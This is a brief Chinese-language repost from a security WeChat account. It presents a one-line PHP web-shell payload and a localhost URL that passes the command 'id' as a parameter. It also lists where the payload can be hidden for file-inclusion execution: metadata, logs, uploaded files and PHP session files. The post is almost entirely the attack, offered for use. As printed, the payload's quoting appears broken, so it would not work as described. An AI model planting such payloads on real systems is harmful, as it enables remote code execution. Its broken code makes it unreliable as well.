<?='$_GET[1]'?>
http://localhost:8000/rce.php?1=id
这个payload可以被用来反映在web应用程序的很多文件中
1、在元数据中
2、在日志的某个地方
3、在您控制的上传文件中
4、在您的 PHP 会话中(它将被写入文件)
本文分享自 Khan安全攻防实验室 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!